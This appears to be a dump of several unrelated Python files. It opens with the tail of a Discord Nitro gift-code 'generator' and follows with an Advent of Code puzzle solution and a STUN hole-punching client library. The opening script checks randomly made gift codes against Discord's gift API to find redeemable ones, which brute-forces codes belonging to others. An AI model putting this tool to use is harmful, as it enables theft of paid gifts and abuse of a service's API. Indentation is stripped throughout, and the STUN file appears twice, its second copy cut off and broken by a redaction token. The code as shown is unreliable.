'Accept-Encoding': 'none',
'Accept-Language': 'en-US,en;q=0.8',
'Connection': 'keep-alive'}
check_url = f"https://discordapp.com/api/v6/entitlements/gift-codes/{nitro_code}?with_application=false&with_subscription_plan=true"
status = requests.get(url=check_url, headers=headers).status_code
if status == 200:
return "True"
elif status == 429:
return "None"
else:
return "False"
except:
print("Something went wrong while checking urls. Press any key to exit. ")
input()
quit()
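# Note on check_code(): it returns the string "True" when the gift endpoint
# answers HTTP 200 (the code looks redeemable), "False" for any other status
# (invalid or already claimed), and "None" when Discord rate-limits the check
# with HTTP 429, so the main loop below compares against these strings.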
def get_nitro_type():
print("Enter what type of Discord Nitro you want to generate: \n\t1. Boost\n\t2. Classic")
user_response = input("> ")
if user_response.replace(" ", "").strip().lower() == "boost" or user_response.replace(" ",
"").strip().lower() == "1":
return "Boost"
elif user_response.replace(" ", "").strip().lower() == "classic" or user_response.replace(" ",
"").strip().lower() == "2":
return "Classic"
else:
print("Not a valid input. Press any key to exit. ")
input()
quit()
print_header()
user_nitro_type = get_nitro_type()
print("Enter the number of Nitro Codes you want: ")
amount = int(input("> "))
valid_codes = 0
invalid_codes = 0
unchecked_codes = 0
print()
print()
f = open("All_Nitro_Codes.txt", "w", encoding='utf-8')
for i in range(amount):
user_nitro_code = get_code(nitro_type=user_nitro_type)
validity = check_code(nitro_code=user_nitro_code)
if validity == "True":
display = f"Valid. | https://discord.com/gifts/{user_nitro_code}"
valid_codes += 1
print(display)
f.writelines(display + "\n")
elif validity == "False":
display = f"Invalid. | https://discord.com/gifts/{user_nitro_code}"
invalid_codes += 1
print(display)
f.writelines(display + "\n")
elif validity == "None":
display = f"Unchecked. Rate limited. | https://discord.com/gifts/{user_nitro_code}"
unchecked_codes += 1
print(display)
f.writelines(display + "\n")
f.close()  # flush and close the output file before reporting results
print("\n\nSuccessfully generated Nitro Codes. ")
print("Valid Nitro Codes: " + str(valid_codes))
print("Invalid Nitro Codes: " + str(invalid_codes))
print("Unchecked Nitro Codes: " + str(unchecked_codes))
print("\nEnter any key to exit.")
input()
quit()
2015/main/13/part2.py | sgravrock/adventofcode | 0 | 8550 |
import sys
import itertools
def readfile(f):
result = {}
for line in f:
fields = line.rstrip().split(" ")
p1 = fields[0]
p2 = fields[10].replace(".", "")
n = int(fields[3])
if fields[2] == "lose":
n *= -1
result[(p1, p2)] = n
return result
def optimal(config):
add_self(config)
diners = set([k[0] for k in config.keys()])
arrangements = list(itertools.permutations(diners))
all = [(arr, happiness(config, arr)) for arr in arrangements]
return max(all, key=lambda p: p[1])
def happiness(config, arrangement):
return sum([happiness_for_pair(config, p) for p in makepairs(arrangement)])
def happiness_for_pair(config, pair):
opposite = (pair[1], pair[0])
return config[pair] + config[opposite]
def add_self(config):
for d in set([k[0] for k in config.keys()]):
config[(d, "self")] = 0
config[("self", d)] = 0
def makepairs(arr):
n = len(arr)
for i in xrange(1, n):
yield (arr[i-1], arr[i])
yield (arr[n-1], arr[0])
if __name__ == "__main__":
print optimal(readfile(sys.stdin))
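# Approach: add_self() seats a neutral "self" diner that contributes zero
# happiness in either direction (Advent of Code 2015 day 13, part 2), then
# optimal() brute-forces every circular seating arrangement, scoring each by
# summing the pairwise happiness in both directions around the table, and the
# highest-scoring arrangement is printed.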
|
networking/connection/stun_client.py | bcgrendel/python_networking | 0 | 8551 |
import socket
import sys
import traceback
import struct
import threading;
from threading import Thread;
import time;
import datetime;
import json
#import buffered_message;
import hashlib
from Crypto.PublicKey import RSA
from connection_state import ConnectionState
# publickey = RSA.importKey(key_string)
import tcp;
import udp;
# *************
# EXAMPLE USAGE
# *************
'''
import socket
import tcp
import udp
import stun_client
import time
start_listening = True
local_ip = socket.gethostbyname(socket.gethostname())
local_port = 30779
server_ip = socket.gethostbyname(socket.gethostname())
server_port = 30788
socket_timeout = 3.0
peer_block_manager = None
client = stun_client.STUN_Client(start_listening, local_ip, local_port, server_ip, server_port, socket_timeout, peer_block_manager)
# Set your available listening port ranges
client.available_ports = [[35000, 35100], [36500, 36700],]
# Register a user account with the stun server.
class RegisterCallback:
def __init__(self):
self.error_message = ""
self.success = None
def handle_timeout(self, params=None):
self.success = False
self.error_message = "Registration request to server has timed-out."
def complete_registration(self, success, error_message=""):
self.success = success
self.error_message = error_message
username = "test_user"
password = "<PASSWORD>"
profile_map = {}
callback_object = RegisterCallback()
registration_type = "permanent"
client.register(username, password, profile_map, callback_object, registration_type)
response_check_interval = 0.5;
while callback_object.success == None:
time.sleep(response_check_interval)
if not callback_object.success:
print "Error: %s" % callback_object.error_message
exit()
# Login with username and password.
class AuthCallback:
def __init__(self):
self.error_message = ""
self.success = None
def handle_timeout(self, params=None):
self.success = False
self.error_message = "Authentication request to server has timed-out."
def complete_authentication(self, success, error_message=""):
self.success = success
self.error_message = error_message
callback_object = AuthCallback()
login = True # this authentication is to login. It'd be False if we wanted to log out.
client.authenticate(username, password, callback_object, login)
while callback_object.success == None:
time.sleep(response_check_interval)
if not callback_object.success:
print "Error: %s" % callback_object.error_message
exit()
# Now we can access the list of peers connected to the server.
# Alternatively, assign a function reference to client.peer_map_callback (argument will be a reference to client.peer_map) to be notified of peer list updates as they are received.
#
# sample peer_map:
# {"test_user": ["test_user", None], "another_user": ["another_user", None]}
# Get a peer from the list.
peer_username = None;
for _username, data in client.peer_map.iteritems():
if username != _username:
peer_username = _username
break
# Connect to that peer (hole-punch)
class ConnectionCallback:
def __init__(self):
self.error_message = ""
self.success = None
self.client_key = None
def handle_timeout(self, params=None):
self.success = False
self.error_message = "Connection request to server has timed-out."
def complete_connection(self, peer_username, success, error_message=""):
self.success = success
if success:
self.client_key = error_message
else:
self.error_message = error_message
buffer_size = 128
callback_object = ConnectionCallback()
client.connect_to_peer(peer_username, buffer_size, callback_object)
while callback_object.success == None:
time.sleep(response_check_interval)
if not callback_object.success:
print "Error: %s" % callback_object.error_message
exit()
client_key = callback_object.client_key
udp_client = client.client_map[client_key]
# Now you can communicate with that peer.
udp_client.send_message("Greetings!")
udp_client.pop_all_messages()
'''
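# The peer_block_manager passed to STUN_Client only needs to expose an
# is_peer_allowed(peer_data) method returning a boolean; it is called with
# [target_username, buffer_size] for outgoing requests and with the raw
# hole_punch message fields for incoming ones. A minimal sketch follows
# (illustrative only; the blocked-username list is an assumption, not part
# of this library):
class ExamplePeerBlockManager:
    def __init__(self, blocked_usernames=None):
        # Usernames in this set are refused; everyone else is allowed.
        self.blocked_usernames = set(blocked_usernames or []);

    def is_peer_allowed(self, peer_data):
        # Reject the request if any field of the peer data matches a blocked username.
        return not any(item in self.blocked_usernames for item in peer_data);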
class STUN_Client:
def __init__(self,
start_listen_thread=False,
local_ip=socket.gethostbyname(socket.gethostname()),
local_port=30779,
server_ip=socket.gethostbyname(socket.gethostname()),
server_port=30788,
socket_timeout=3.0,
peer_block_manager=None):
self.local_ip = local_ip;
self.local_port = local_port;
self.socket_timeout = socket_timeout;
self.peer_block_manager = peer_block_manager;
self.thread_sleep_duration = 0.1;
self.error_log = [];
self.username = None;
        self.password = None;
self.profile_map = {};
self.authenticated = False;
self.auth_callback = None;
self.auth_keys = None;
self.auth_timeout = 15; # 15 seconds is the limit for authentication requests. It's just a magic number like many of these timeout values.
self.last_auth = None;
self.login_expiration = 20; # login will expire after this many seconds passes without successful keep-alive authentication
self.auth_keep_alive_interval = 5;
self.auth_keep_alive_multiplier = 1; # Avoid hammering the server if it's down. Will increment every time re-auth fails, returns to 1 upon successful authentication.
self.re_auth_ready = None;
        self.master_log = []; # all messages received
self.message_log_map = {}; # log per message type.
# this will handle callbacks for keeping track of whether the user's authentication expires (namely from losing connection to the server.)
self.authentication_monitor_object = None;
self.hole_punch_timeout = 20;
self.hole_punch_max_attempts = 20;
self.server_response_timeout = 20;
# Server response flags. Set to None when sending a request; they are flipped to True upon receiving a response. Used for determining response time-out.
self._auth_status = None;
self._registration_status = None; # Private. Internal use only.
self._holepunch_status = {};
self.available_ports = [[34000, 34100],] # list of ranges, e.g. ports 34000 - 34100
self.used_ports = [];
self.registration_key = None;
self.udp_client_keep_alive_timeout = 30;
# dictionary of active udp connections (hole-punched)
self.client_map = {};
self.callback_map = {};
self.send_queue = [];
self.connection_state = ConnectionState(False);
# Initialize TCP client.
self.init_tcp_client(server_ip, server_port);
self.peer_map = {};
# Start listening to the stun server.
self.init_stun_listener();
self.keep_alive_monitor = KeepAliveMonitor(self);
self.peer_map_callback = None;
def shutdown(self, stun_only=True):
self.authenticated = False;
self.connection_state.active = False; # kills main thread, making the logout auth sequence impossible in its current implementation (get salt/key, then perform request) which needs the main loop.
self.stun_client.disconnect();
if not stun_only:
# disconnect all udp clients...
for key, client in self.client_map.iteritems():
client.disconnect();
self.client_map.clear();
self.peer_map.clear();
del self.used_ports[:]
def restart(self, stun_only=True):
self.shutdown(stun_only);
self.init_tcp_client(self.server_ip, self.server_port);
self.init_stun_listener();
def log_error(self, error_message, extra=None):
err_msg = "[STUN_Server] Line #%s: %s\n\n%s" % (str(traceback.tb_lineno(sys.exc_traceback)), traceback.format_exc(), sys.exc_info());
timestamp = time.time();
date_string = datetime.datetime.fromtimestamp(timestamp).strftime('(%Y-%m-%d) %H:%M:%S')
self.error_log.append((timestamp, date_string, err_msg, extra));
def monitor_response(self, target_object, target_key=None, timeout=20, callback=None, callback_params=None, timeout_callback=None, timeout_callback_params=None):
"""Waits until target is no longer null or timeout occurs. Timeout is in seconds. target_object and target_key should be strings.
If target key is not null, then target_object will be treated as a dictionary (using target_key for the index).
This function is best utilized on its own separate thread."""
# Wait until salt and key have been retrieved or timeout occurs.
time_elapsed = 0;
start_time = time.time();
target_attribute = getattr(self, target_object);
target = None;
connection_state = self.connection_state
#print "Monitoring for %s" % target_object;
# Behold, python lambda expressions in the wild!
if target_key == None:
target = lambda parent: getattr(parent, target_object);
else:
target = lambda parent: getattr(parent, target_object)[target_key];
while time_elapsed < timeout:
time_elapsed = time.time() - start_time;
# check for shutdown.
if not connection_state.active:
return;
# check for target condition
if target(self) != None:
break;
time.sleep(self.thread_sleep_duration);
# Check for timeout.
if target(self) == None:
#print "Timeout on %s" % target_object;
has_timeout_callback = timeout_callback != None;
if has_timeout_callback:
if timeout_callback_params != None:
timeout_callback(timeout_callback_params);
else:
timeout_callback();
return;
#else:
# print "No timeout on %s" % target_object;
# Success, run the callback if one was provided (maybe not if one is only concerned with the timeout event).
if callback != None:
if callback_params != None:
callback(target_object, target_key, callback_params);
else:
callback(target_object, target_key);
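    # How monitor_response() is used below (illustrative comment only): a request
    # method clears a flag such as self._auth_status = None, sends its message,
    # and then runs something like
    #     self.monitor_response("_auth_status", None, self.server_response_timeout,
    #                           success_callback, params, timeout_handler)
    # on a worker thread, so whichever happens first - the listener thread setting
    # the flag, or the timeout - drives the matching callback.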
def authenticate_thread(self, username, password, callback_object=None, login=True):
# callback_object should have a complete_authentication(success, error_message) method.
self.username = username;
self.password = password;
self.auth_callback = callback_object;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
# Send salt and dynamic key retrieval request.
self.auth_keys = None;
message = "auth_salt_request %s" % username;
if not self.stun_send_message(message):
#callback_object.complete_authentication(False, "Failed to connect to the server.");
if timeout_handler != None:
timeout_handler("Failed to connect to the server.");
return;
# Wait until salt and key have been retrieved or timeout occurs.
self.monitor_response("auth_keys", None, self.server_response_timeout, self.authenticate_send_credentials, [login, callback_object], timeout_handler, "Server failed to respond.");
def authenticate_send_credentials(self, target_object=None, target_key=None, params=None):
callback_object = None;
if params != None:
callback_object = params[1];
login = params[0]
# hash the password
salt, dynamic_key = self.auth_keys;
if not salt:
if callback_object != None:
callback_object.complete_authentication(False, "Failed to connect to the server.");
return;
        salted_password = "%s%s" % (salt, self.password)
        # NOTE: the hash calls below were redacted in the source dump; sha224 is an assumption.
        hashed_salted_password = hashlib.sha224(salted_password).hexdigest();
        #print "hash1: %s\n" % hashed_salted_password;
        key_and_hash = "%s%s" % (dynamic_key, hashed_salted_password)
        hashed_password = hashlib.sha224(key_and_hash).hexdigest();
#print "hash2: %s" % hashed_password;
self._auth_status = None;
# Send authentication request.
message = "authenticate %s" % json.dumps([self.username, hashed_password, login, json.dumps(self.available_ports), json.dumps(self.used_ports)]);
if not self.stun_send_message(message):
if callback_object != None:
callback_object.complete_authentication(False, "Failed to connect to the server.");
return;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
self.monitor_response("_auth_status", None, self.server_response_timeout, None, None, timeout_handler);
def registration_completion_handler(self, target_object, target_key, params):
callback_object = params;
registration_handler = None;
has_registration_handler = ((callback_object != None) and (hasattr(callback_object, "complete_registration")))
if has_registration_handler:
callback_object.complete_registration(True, "");
def send_encrypted_registration_request(self, target_object=None, target_key=None, params=None):
username, password, profile_map, callback_object, registration_type = params;
self._registration_status = None;
# Construct the message.
message = "%s" % json.dumps([username, password, profile_map, registration_type]);
# Encrypt the message.
public_key = RSA.importKey(self.registration_key)
message = public_key.encrypt(message, 32);
        # Tack on the username in plain text and json_encode again. The STUN Server needs the username to determine which private key to use to decrypt the message.
message = "register %s %s" % (username, message[0]);
if not self.stun_send_message(message):
callback_object.complete_registration(False, "Failed to connect to the server.");
return;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
# Wait until salt and key have been retrieved or timeout occurs.
self.monitor_response("_registration_status", None, self.server_response_timeout, self.registration_completion_handler, callback_object, timeout_handler);
def register_thread(self, username, password, profile_map, callback_object=None, registration_type="permanent"):
# callback_object should have a complete_registration(success, error_message) method.
self.username = username;
self.password = password;
self.profile_map = profile_map;
self.register_callback = callback_object;
self.registration_key = None;
message = "register_key %s" % username;
if not self.stun_send_message(message):
callback_object.complete_registration(False, "Failed to connect to the server.");
return;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
params = [username, password, profile_map, callback_object, registration_type];
self.monitor_response("registration_key", None, self.server_response_timeout, self.send_encrypted_registration_request, params, timeout_handler);
def authenticate(self, username, password, callback_object=None, login=True):
"""Non-blocking. Sends a user authentication request."""
# Spawn a separate thread to perform authentication. This is to keep from blocking the caller, since a callback is expected to handle results.
Thread(target=self.authenticate_thread, args=(username, password, callback_object, login)).start();
def maintain_authentication(self, callback_object=None):
#self.authentication_monitor_object
username = self.username
        password = self.password
last_auth = self.last_auth
self.re_auth_ready = True;
while self.authenticated:
last_reauth = self.keep_alive_monitor.last_reauth_attempt;
now = time.time();
ready_time = last_reauth + (self.auth_keep_alive_multiplier * self.auth_keep_alive_interval);
time_for_another_reauth_attempt = now >= ready_time;
# By re_auth_ready, I'm saying a re-authentication attempt isn't currently in progress. Yes, it's a poorly named variable.
# I'll need to rename it something better. Maybe later (trademark).
if self.re_auth_ready and time_for_another_reauth_attempt:
self.re_auth_ready = False;
self.authenticate(self.username, self.password, self.keep_alive_monitor);
time.sleep(self.thread_sleep_duration);
def logout(self):
self.authenticated = False;
self.authenticate(self.username, self.password, self.keep_alive_monitor, False);
def register(self, username, password, profile_map, callback_object=None, registration_type="permanent"):
"""Non-blocking. Sends a user registration request.
Only type of registration available for now is 'permanent'. Temporary to come later, maybe (for guests/'unregistered' users).
Note that profile_map should be a json-encoded string (you can store arbitrary data here)."""
# Spawn a separate thread to perform registration. This is to keep from blocking the caller, since a callback is expected to handle results.
Thread(target=self.register_thread, args=(username, password, profile_map, callback_object, registration_type)).start();
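    # Example call (illustrative; the profile fields are arbitrary):
    #     client.register("alice", "secret", json.dumps({"display_name": "Alice"}),
    #                     callback_object=my_register_callback)
    # The callback object only needs a complete_registration(success, error_message)
    # method, plus an optional handle_timeout(params) method for timeouts.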
def init_tcp_client(self, server_ip, server_port, buffer_size=1024):
self.server_ip = server_ip;
self.server_port = server_port;
self.stun_client = tcp.TCP_Client(server_ip, server_port, buffer_size);
def init_stun_listener(self):
self.connection_state = ConnectionState(True);
Thread(target=self.stun_listen_loop).start();
def stun_send_message(self, message, json_encode=False, prepare=True):
try:
self.stun_client.send_message(message, json_encode, prepare);
return True;
except:
return False;
def stun_listen_loop(self):
connection_state = self.connection_state
message_object = None
while self.connection_state.active:
try:
message_object = self.stun_client.pop_message();
is_valid_message = ((message_object != None) and (len(message_object) > 2));
self.master_log.append(message_object);
if is_valid_message:
message = message_object[2];
message_type, message_body = message.split(" ",1);
if message_type not in self.message_log_map:
self.message_log_map[message_type] = [];
self.message_log_map[message_type].append(message_object);
#print "MESSAGE: %s\n" % message_object;
if(message_type == "peer_map"):
# peer data should be [[peer_username, public_profile_map], ...]
message_data = json.loads(message_body);
self.update_peer_map(message_data);
if self.peer_map_callback != None:
self.peer_map_callback(self.peer_map);
elif(message_type == "hole_punch"):
peer_allowed = True;
# message body should be [listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size]
message_data = json.loads(message_body);
listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size = message_data
port_in_use = False;
# Ensure port isn't already in use.
if listen_port in self.used_ports:
port_in_use = True;
self.stun_send_message("hole_punch_reject %s" % json.dumps([listen_ip, listen_port, self.username, peer_ip, peer_port, peer_username, buffer_size, port_in_use]));
continue;
message_body = json.dumps([listen_ip, listen_port, self.username, peer_ip, peer_port, peer_username, buffer_size, port_in_use]);
if(self.peer_block_manager != None):
peer_allowed = self.peer_block_manager.is_peer_allowed(message_data);
if(peer_allowed):
self.stun_send_message("hole_punch_ack %s" % message_body);
else:
self.stun_send_message("hole_punch_reject %s" % message_body);
elif(message_type == "hole_punch_request_rejected"):
# Deals with requests that fail due to lack of authentication (this client or the target client) or target client doesn't exist.
# message_body should be [listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size]
fail_type, target_username, error_message = json.loads(message_body);
if target_username in self.callback_map:
callback_object = self.callback_map[target_username];
callback_object.complete_connection(target_username, False, error_message);
del self.callback_map[target_username];
elif(message_type == "hole_punch_rejected"):
# message_body should be [listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size]
message_data = json.loads(message_body);
listen_ip, listen_port, self.username, target_ip, target_port, username, buffer_size = message_data
client_key = "%s-%s-%s" % (target_ip, target_port, username);
callback_object = None;
if client_key in self.callback_map:
callback_object = self.callback_map[client_key]
if callback_object != None:
callback_object.complete_connection(client_key, False, "Peer rejected the connection request.");
del self.callback_map[client_key];
elif(message_type == "init_hole_punch"):
try:
listen_ip, listen_port, peer_ip, peer_port, peer_username, buffer_size = json.loads(message_body);
if listen_port not in self.used_ports:
self.used_ports.append(listen_port);
# No else. We're just going to hope there's no way for that if to not run, and that we're just being half-assed at feeling paranoid.
# My mind is feeling like it's been twisted into a few knots at this point, to be honest.
Thread(target=self.connect_to_remote_peer, args=(listen_ip, listen_port, peer_ip, peer_port, buffer_size, peer_username)).start();
client_key = "%s_%s_%s" % (peer_ip, peer_port, peer_username)
if peer_username in self._holepunch_status:
self._holepunch_status[peer_username] = True;
if peer_username in self.callback_map:
self.callback_map[client_key] = self.callback_map[peer_username];
del self.callback_map[peer_username]
except Exception as e:
self.log_error(e);
elif(message_type == "auth_keys"):
# message body should be [salt, dynamic_key]
self.auth_keys = json.loads(message_body);
elif(message_type == "auth_response"):
# message body should be [success, username, profile_map, login, error_message]
success, username, profile_map, login, error_message = json.loads(message_body);
self._auth_status = True;
new_auth = not self.authenticated;
if success:
if login:
self.authenticated = True;
self.auth_keep_alive_multiplier = 1;
self.last_auth = time.time();
self.username = username;
self.profile_map = profile_map;
if new_auth:
Thread(target=self.maintain_authentication).start();
else:
self.authenticated = False;
self.auth_keep_alive_multiplier = 1;
self.last_auth = time.time();
self.username = username;
self.profile_map = profile_map;
if self.auth_callback != None:
self.auth_callback.complete_authentication(success, error_message);
elif(message_type == "registration_key"):
# message body should be "public_key"
self.registration_key = message_body;
elif(message_type == "registration_response"):
# message body should be [success, username, profile_map, error_message]
success, username, profile_map, error_message = json.loads(message_body);
if success:
self.username = username;
self.profile_map = profile_map;
self._registration_status = True;
                        if self.register_callback != None:
self.register_callback.complete_registration(success, error_message);
except Exception as exc:
self.log_error(exc, message_object);
time.sleep(self.thread_sleep_duration);
def update_peer_map(self, packet):
username_list = [];
current_username_list = self.peer_map.keys();
for user_block in packet:
peer_username, profile_map = user_block;
valid_username = ((peer_username != None) and (peer_username.replace(" ","").replace("\t","").replace("\n","").replace("\r","") != ""));
if valid_username:
username_list.append(peer_username);
self.peer_map[peer_username] = user_block;
remove_username_list = [];
for username in current_username_list:
if username not in username_list:
remove_username_list.append(username);
for username in remove_username_list:
del self.peer_map[username];
def auto_select_local_endpoint(self):
listen_ip = self.local_ip;
range_count = len(self.available_ports);
for i in range(0, range_count):
x = range_count - (1 + i)
port_range = self.available_ports[x]
port_count = port_range[1] - port_range[0]
for j in range(0, port_count):
port = port_range[1] - j;
if port not in self.used_ports:
return (listen_ip, port);
return None;
def connect_to_peer(self, target_username, buffer_size, callback_object=None, listen_ip = None, listen_port = None):
""" callback_object should have a complete_connection(target, success, error_message) method where success is True or False.
Extract info with:
ip, port, username = target.split("-",2)
Returns False if it fails to send request message (e.g. peer is blocked or connection to server failed.).
"""
local_endpoint_not_specified = ((listen_ip == None) or (listen_port == None))
if local_endpoint_not_specified:
try:
listen_ip, listen_port = self.auto_select_local_endpoint();
except:
                callback_object.complete_connection(target_username, False, "All available allowed local ports are already in use. Cannot initiate connection to peer.");
return False;
# Disallow connecting to yourself. What are you trying to pull?
if self.username == target_username:
            callback_object.complete_connection(target_username, False, "You cannot connect to yourself.");
return False;
# disallow connecting to blocked peers.
if(self.peer_block_manager != None):
peer_allowed = self.peer_block_manager.is_peer_allowed([target_username, buffer_size]);
if not peer_allowed:
                callback_object.complete_connection(target_username, False, "This peer has been blocked.");
return False;
client_key = target_username;
self.callback_map[client_key] = callback_object;
self._holepunch_status[client_key] = None;
# Start hole_punch process.
message = "request_hole_punch %s" % json.dumps([listen_ip, listen_port, self.username, target_username, buffer_size])
if not self.stun_send_message(message):
callback_object.complete_connection(client_key, False, "Failed to connect to the server.");
del self.callback_map[client_key];
return False;
timeout_handler = None;
has_timeout_handler = ((callback_object != None) and (hasattr(callback_object, "handle_timeout")))
if has_timeout_handler:
timeout_handler = callback_object.handle_timeout
# Wait until salt and key have been retrieved or timeout occurs.
Thread(target=self.monitor_response, args=("_holepunch_status", client_key, self.server_response_timeout, None, None, timeout_handler)).start();
return True;
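    # What happens after connect_to_peer() returns True: the server relays the
    # request, both peers receive an "init_hole_punch" message in
    # stun_listen_loop(), and each side spawns connect_to_remote_peer() below.
    # That opens a UDP socket on the agreed endpoint, and hole_punch() exchanges
    # syn/ack/ack2 probes until the NAT mapping is open or the attempt times out.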
def connect_to_remote_peer(self, local_ip, local_port, target_ip, target_port, buffer_size, username):
"""Warning: Internal use only!"""
print "Connecting to remote peer."
udp_client = udp.UDP_Client(True, local_ip, local_port, target_ip, target_port, buffer_size, True);
client_key = "%s_%s_%s" % (target_ip, target_port, username)
callback_object = None;
if client_key in self.callback_map:
callback_object = self.callback_map[client_key]
if self.hole_punch(udp_client, self.hole_punch_max_attempts, self.hole_punch_timeout):
print "Hole-punch succeeded."
if callback_object != None:
callback_object.complete_connection(username, True, client_key);
self.client_map[client_key] = udp_client; # success, add it to the map.
else:
print "Hole-punch failed."
# remove that port from the used ports list.
port_count = len(self.used_ports);
for i in range(0, port_count):
if self.used_ports[i] == local_port:
del self.used_ports[i]
break;
# run the callback, if there is one.
if callback_object != None:
callback_object.complete_connection(client_key, False, "Failed to connect to peer.");
def hole_punch_send_loop(self, udp_client, maximum_retries=20, delay=0.5):
for i in range(0, maximum_retries):
udp_client.send_message("syn", False, False);
time.sleep(delay);
# Create and return a udp socket that has established connection with the target peer, or None if it fails.
def hole_punch(self, udp_client, maximum_retries=20, timeout=20):
print "Performing hole-punch."
delay = 0.5
result = False;
connection_state = self.connection_state
Thread(target=self.hole_punch_send_loop, args=(udp_client, maximum_retries, delay)).start();
start_time = time.time();
for i in range(0, maximum_retries):
time.sleep(delay)
if not connection_state.active:
# give up and close it out.
udp_client.disconnect();
print "Fail 1";
return False;
packet = "";
try:
packet = udp_client.pop_message();
except:
pass;
if packet != None:
print "hole_punch_response: " + str(packet);
if len(packet) >= 3:
# check the packet.
if(packet[2] == "syn"):
udp_client.send_message("ack", False, False); # send acknowledge
elif(packet[2] == "ack"):
udp_client.send_message("ack2", False, False); # send ack ack and return socket.
result = True;
print "Success 1";
break;
elif(packet[2] == "ack2"):
result = True; # ack ack received, return socket.
print "Success 2";
break;
# check for timeout
time_elapsed = time.time() - start_time;
if(time_elapsed >= timeout):
print "Fail 2";
break;
return result;
class KeepAliveMonitor:
def __init__(self, parent):
self.parent = parent;
self.last_reauth_attempt = time.time();
def complete_authentication(self, success, error_message=""):
self.parent.re_auth_ready = True;
self.last_reauth_attempt = time.time();
if not success:
self.parent.auth_keep_alive_multiplier += 1;
def handle_timeout(self, params=None):
self.last_reauth_attempt = time.time();
self.parent.re_auth_ready = True;
self.parent.auth_keep_alive_multiplier += 1;
import sys
import traceback
import struct
import threading;
from threading import Thread;
import time;
import datetime;
import json
#import buffered_message;
import hashlib
from Crypto.PublicKey import RSA
from connection_state import ConnectionState
# publickey = RSA.importKey(key_string)
import tcp;
import udp;
# *************
# EXAMPLE USAGE
# *************
'''
import socket
import tcp
import udp
import stun_client
import time
start_listening = True
local_ip = socket.gethostbyname(socket.gethostname())
local_port = 30779
server_ip = socket.gethostbyname(socket.gethostname())
server_port = 30788
socket_timeout = 3.0
peer_block_manager = None
client = stun_client.STUN_Client(start_listening, local_ip, local_port, server_ip, server_port, socket_timeout, peer_block_manager)
# Set your available listening port ranges
client.available_ports = [[35000, 35100], [36500, 36700],]
# Register a user acccount with the stun server.
class RegisterCallback:
def __init__(self):
self.error_message = ""
self.success = None
def handle_timeout(self, params=None):
self.success = False
self.error_message = "Registration request to server has timed-out."
def complete_registration(self, success, error_message=""):
self.success = success
self.error_message = error_message
username = "test_user"
password = "<PASSWORD>"
profile_map = {}
callback_object = RegisterCallback()
registration_type = "permanent"
client.register(username, password, profile_map, callback_object, registration_type)
response_check_interval = 0.5;
while callback_object.success == None:
time.sleep(response_check_interval)
if not callback_object.success:
print "Error: %s" % callback_object.error_message
exit()
# Login with username and password.
class AuthCallback:
def __init__(self):
self.error_message = ""
self.success = None
def handle_timeout(self, params=None):
self.success = False
self.error_message = "Authentication request to server has timed-out."
def complete_authentication(self, success, error_message=""):
self.success = success
self.error_message = error_message
callback_object = AuthCallback()
login = True # this authentication is to login. It'd be False if we wanted to log out.
client.authenticate(username, password, callback_object, login)
while callback_object.success == None:
time.sleep(response_check_interval)
if not callback_object.success:
print "Error: %s" % callback_object.error_message
exit()
# Now we can access the list of peers connected to the server.
# Alternatively, assign a function reference to client.peer_map_callback (argument will be a reference to client.peer_map) to be notified of peer list updates as they are received.
#
# sample peer_map:
# ["test_user":["test_user", None], "another_user":["another_user", None],]
# Get a peer from the list.
peer_username = None;
for _username, data in client.peer_map.iteritems():
if username != _username:
peer_username = _username
break
# Connect to that peer (hole-punch)
class ConnectionCallback:
def __init__(self):
self.error_message = ""
self.success = None
self.client_key = None
def handle_timeout(self, params=None):
self.success = False
self.error_message = "Connection request to server has timed-out."
def complete_connection(self, peer_username, success, error_message=""):
self.success = success
if success:
self.client_key = error_message
else:
self.error_message = error_message
buffer_size = 128
callback_object = ConnectionCallback()
client.connect_to_peer(peer_username, buffer_size, callback_object)
while callback_object.success == None:
time.sleep(response_check_interval)
if not callback_object.success:
print "Error: %s" % callback_object.error_message
exit()
client_key = callback_object.client_key
udp_client = client.client_map[client_key]
# Now you can communicate with that peer.
udp_client.send_message("Greetings!")
udp_client.pop_all_messages()
'''
class STUN_Client:
def __init__(self,
start_listen_thread=False,
local_ip=socket.gethostbyname(socket.gethostname()),
local_port=30779,
server_ip=socket.gethostbyname(socket.gethostname()),
server_port=30788,
socket_timeout=3.0,
peer_block_manager=None):
self.local_ip = local_ip;
self.local_port = local_port;
self.socket_timeout = socket_timeout;
self.peer_block_manager = peer_block_manager;
self.thread_sleep_duration = 0.1;
self.error_log = [];
self.username = None;
self.password = <PASSWORD>;
self.profile_map = {};
self.authenticated = False;
self.auth_callback = None;
self.auth_keys = None;
self.auth_timeout = 15; # 15 seconds is the limit for authentication requests. It's just a magic number like many of these timeout values.
self.last_auth = None;
self.login_expiration = 20; # login will expire after this many seconds passes without successful keep-alive authentication
self.auth_keep_alive_interval = 5;
self.auth_keep_alive_multiplier = 1; # Avoid hammering the server if it's down. Will increment every time re-auth fails, returns to 1 upon successful authentication.
self.re_auth_ready = None;
self.master_log = []; # all messages recieved
self.message_log_map = {}; # log per message type.
# this will handle callbacks for keeping track of whether the user's authentication expires (namely from losing connection to the server.)
self.authentication_monitor_object = None;
self.hole_punch_timeout = 20;
self.hole_punch_max_attempts = 20;
self.server_response_timeout = 20;
# Server response flags. Set to None when sending a request; they are flipped to True upon receiving a response. Used for determining response time-out.
self._auth_status = None;
self._registration_status = None; # Private. Internal use only.
self._holepunch_status = {};
self.available_ports = [[34000, 34100],] # list of ranges, e.g. ports 34000 - 34100
self.used_ports = [];
self.registration_key = None;
self.udp_client_keep_alive_timeout = 30;
# dictionary of active udp connections (hole-punched)
self.client_map = {};
self.callback_map = {};
self.send_queue = [];
self.connection_state = ConnectionState(False);
# Initialize TCP client.
self.init_tcp_client(server_ip, server_port);
self.peer_map = {};
# Start listening to the stun server.
self.init_stun_listener();
self.keep_alive_monitor = KeepAliveMonitor(self);
